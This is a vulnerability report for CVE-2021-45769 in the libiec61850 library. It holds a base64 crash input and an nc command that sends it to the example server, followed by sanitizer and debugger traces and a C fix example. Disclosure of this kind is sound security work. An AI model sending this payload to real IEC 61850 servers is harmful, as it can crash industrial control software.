CVE-2021-45769: NULL Pointer Dereference in AcseConnection_parseMessage · Issue #368 · mz-automation/libiec61850
A NULL pointer dereference in AcseConnection_parseMessage at src/mms/iso_acse/acse.c of libiec61850 v1.5.0 can lead to a segmentation fault or application crash.
NULL Pointer Dereference in AcseConnection_parseMessage
Description
A NULL Pointer Dereference was discovered in AcseConnection_parseMessage at src/mms/iso_acse/acse.c:429. The vulnerability causes a segmentation fault and application crash.
Version
8eeb6f0
System information
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz
Proof of Concept
poc (base64 encoded):
AwAAFgLwgA0NAQDBATGBAgABogIAAA==
command:
./server_example_basic_io
nc 0.0.0.0 102 < poc
Result
./server_example_basic_io
Using libIEC61850 version 1.5.0
Connection opened
AddressSanitizer:DEADLYSIGNAL
=================================================================
==4028537==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55de6e46db68 bp 0x7fac36efcaa0 sp 0x7fac36efc9f0 T3)
==4028537==The signal is caused by a READ memory access.
==4028537==Hint: address points to the zero page.
#0 0x55de6e46db67 in AcseConnection_parseMessage src/mms/iso_acse/acse.c:429
#1 0x55de6e41960b in IsoConnection_handleTcpConnection src/mms/iso_server/iso_connection.c:233
#2 0x55de6e41ac5d in handleTcpConnection src/mms/iso_server/iso_connection.c:472
#3 0x7fac3b7e3608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477
#4 0x7fac3b5bb292 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x122292)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mms/iso_acse/acse.c:429 in AcseConnection_parseMessage
Thread T3 created by T1 here:
#0 0x7fac3b837805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
#1 0x55de6e3b19dc in Thread_start hal/thread/linux/thread_linux.c:89
#2 0x55de6e41b4f7 in IsoConnection_start src/mms/iso_server/iso_connection.c:581
#3 0x55de6e417bf1 in handleIsoConnections src/mms/iso_server/iso_server.c:520
#4 0x55de6e417c99 in isoServerThread src/mms/iso_server/iso_server.c:554
#5 0x7fac3b7e3608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477
Thread T1 created by T0 here:
#0 0x7fac3b837805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
#1 0x55de6e3b19dc in Thread_start hal/thread/linux/thread_linux.c:89
#2 0x55de6e4182d2 in IsoServer_startListening src/mms/iso_server/iso_server.c:682
#3 0x55de6e3b9b50 in MmsServer_startListening src/mms/iso_mms/server/mms_server.c:606
#4 0x55de6e3adae9 in IedServer_start src/iec61850/server/impl/ied_server.c:692
#5 0x55de6e39537e in main /root/disk2/fuzzing/libiec61850/test/libiec61850/examples/server_example_basic_io/server_example_basic_io.c:146
#6 0x7fac3b4c00b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
==4028537==ABORTING
gdb
Using libIEC61850 version 1.5.0
[New Thread 0x7ffff3bff700 (LWP 4048010)]
[New Thread 0x7ffff33fe700 (LWP 4048011)]
Connection opened
[New Thread 0x7ffff2bfd700 (LWP 4048307)]
Thread 4 "server_example_" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff2bfd700 (LWP 4048307)]
0x0000555555661b68 in AcseConnection_parseMessage (self=0x608000004020, message=0x6060000030a8) at src/mms/iso_acse/acse.c:429
429 uint8_t messageType = buffer[bufPos++];
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
RAX 0x0
RBX 0x7ffff2bfca20 ◂— 0x41b58ab3
RCX 0x0
RDX 0x0
RDI 0x7ffff2bfca80 —▸ 0x7ffff2bfce60 ◂— 0x0
RSI 0x0
R8 0x0
R9 0x32
R10 0x40
R11 0x0
R12 0xffffe57f944 ◂— 0x0
R13 0x7ffff2bfca20 ◂— 0x41b58ab3
R14 0x7ffff2bfcb40 ◂— 0x41b58ab3
R15 0x7ffff2bfcf80 ◂— 0x0
RBP 0x7ffff2bfcaa0 —▸ 0x7ffff2bfce80 —▸ 0x7ffff2bfceb0 ◂— 0x0
RSP 0x7ffff2bfc9f0 —▸ 0x6060000030a8 ◂— 0x0
RIP 0x555555661b68 (AcseConnection_parseMessage+383) ◂— movzx eax, byte ptr [rcx]
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
► 0x555555661b68 <AcseConnection_parseMessage+383> movzx eax, byte ptr [rcx]
0x555555661b6b <AcseConnection_parseMessage+386> mov byte ptr [rbp - 0x95], al
0x555555661b71 <AcseConnection_parseMessage+392> mov ecx, dword ptr [rbp - 0x90]
0x555555661b77 <AcseConnection_parseMessage+398> mov edx, dword ptr [rbp - 0x8c]
0x555555661b7d <AcseConnection_parseMessage+404> lea rsi, [rdi - 0x40]
0x555555661b81 <AcseConnection_parseMessage+408> mov rax, qword ptr [rbp - 0x88]
0x555555661b88 <AcseConnection_parseMessage+415> mov rdi, rax
0x555555661b8b <AcseConnection_parseMessage+418> call BerDecoder_decodeLength <BerDecoder_decodeLength>
0x555555661b90 <AcseConnection_parseMessage+423> mov dword ptr [rbp - 0x8c], eax
0x555555661b96 <AcseConnection_parseMessage+429> cmp dword ptr [rbp - 0x8c], 0
0x555555661b9d <AcseConnection_parseMessage+436> jns AcseConnection_parseMessage+448
<AcseConnection_parseMessage+448>
──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /root/disk2/fuzzing/libiec61850/test/libiec61850/src/mms/iso_acse/acse.c
424
425 int messageSize = message->size;
426
427 int bufPos = 0;
428
► 429 uint8_t messageType = buffer[bufPos++];
430
431 int len;
432
433 bufPos = BerDecoder_decodeLength(buffer, &len, bufPos, messageSize);
434
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp 0x7ffff2bfc9f0 —▸ 0x6060000030a8 ◂— 0x0
01:0008│ 0x7ffff2bfc9f8 —▸ 0x608000004020 ◂— 0x0
02:0010│ 0x7ffff2bfca00 —▸ 0x7ffff2bfcb40 ◂— 0x41b58ab3
03:0018│ 0x7ffff2bfca08 —▸ 0xa2310146 ◂— 0x0
04:0020│ 0x7ffff2bfca10 —▸ 0x100000000 ◂— 0x0
05:0028│ 0x7ffff2bfca18 ◂— 0x0
06:0030│ rbx r13 0x7ffff2bfca20 ◂— 0x41b58ab3
07:0038│ 0x7ffff2bfca28 —▸ 0x5555556d71d8 ◂— '1 32 4 7 len:431'
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
► f 0 0x555555661b68 AcseConnection_parseMessage+383
f 1 0x55555560d60c IsoConnection_handleTcpConnection+1422
f 2 0x55555560ec5e handleTcpConnection+43
f 3 0x7ffff7564609 start_thread+217
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 0x0000555555661b68 in AcseConnection_parseMessage (self=0x608000004020, message=0x6060000030a8) at src/mms/iso_acse/acse.c:429
#1 0x000055555560d60c in IsoConnection_handleTcpConnection (self=0x61100000ff40, isSingleThread=false) at src/mms/iso_server/iso_connection.c:233
#2 0x000055555560ec5e in handleTcpConnection (parameter=0x61100000ff40) at src/mms/iso_server/iso_connection.c:472
#3 0x00007ffff7564609 in start_thread (arg=<optimized out>) at pthread_create.c:477
#4 0x00007ffff733c293 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
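The register dump above (RCX == 0 at `movzx eax, byte ptr [rcx]`, with bufPos still 0) shows that the message buffer pointer itself is NULL when line 429 reads `buffer[0]`. The following is an added example, not libiec61850's code: a minimal `ByteBuffer` struct stands in for the library's message type (an assumption), and the unchecked read from the report is placed beside a variant that validates the pointer and size before parsing. The error codes and function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Stand-in for the library's byte-buffer type (assumption, not the real
 * libiec61850 definition): payload pointer plus its length. */
typedef struct {
    uint8_t *buffer;
    int size;
} ByteBuffer;

/* Result codes for the hardened parser (hypothetical names). */
enum { ACSE_ERR_NO_BUFFER = -1, ACSE_ERR_TRUNCATED = -2 };

/* Mirrors the first statements of AcseConnection_parseMessage in the report:
 * the type byte is read from buffer[0] before anything checks that the buffer
 * exists. When buffer == NULL this reads address 0 and the process SIGSEGVs. */
static int parseMessage_unchecked(ByteBuffer *message, uint8_t *messageType)
{
    uint8_t *buffer = message->buffer;
    int bufPos = 0;
    *messageType = buffer[bufPos++];   /* crashes when buffer is NULL */
    return bufPos;
}

/* Hardened variant: reject a missing buffer, and a buffer too short to hold
 * the type byte plus a one-byte BER length, before touching memory. */
static int parseMessage_checked(ByteBuffer *message, uint8_t *messageType)
{
    if (message == NULL || message->buffer == NULL)
        return ACSE_ERR_NO_BUFFER;
    if (message->size < 2)
        return ACSE_ERR_TRUNCATED;
    uint8_t *buffer = message->buffer;
    int bufPos = 0;
    *messageType = buffer[bufPos++];
    return bufPos;                     /* caller continues with BER length decode */
}

int main(void)
{
    uint8_t aarq[] = { 0x60, 0x00 };   /* constructed sample: AARQ tag, zero length */
    ByteBuffer good = { aarq, (int)sizeof aarq };
    ByteBuffer bad  = { NULL, 0 };     /* the state observed in the crash (RCX == 0) */
    uint8_t type = 0;
    printf("unchecked, valid buffer: pos %d\n", parseMessage_unchecked(&good, &type));
    printf("checked, valid buffer:   %d (type 0x%02x)\n", parseMessage_checked(&good, &type), type);
    printf("checked, NULL buffer:    %d\n", parseMessage_checked(&bad, &type));
    return 0;
}
```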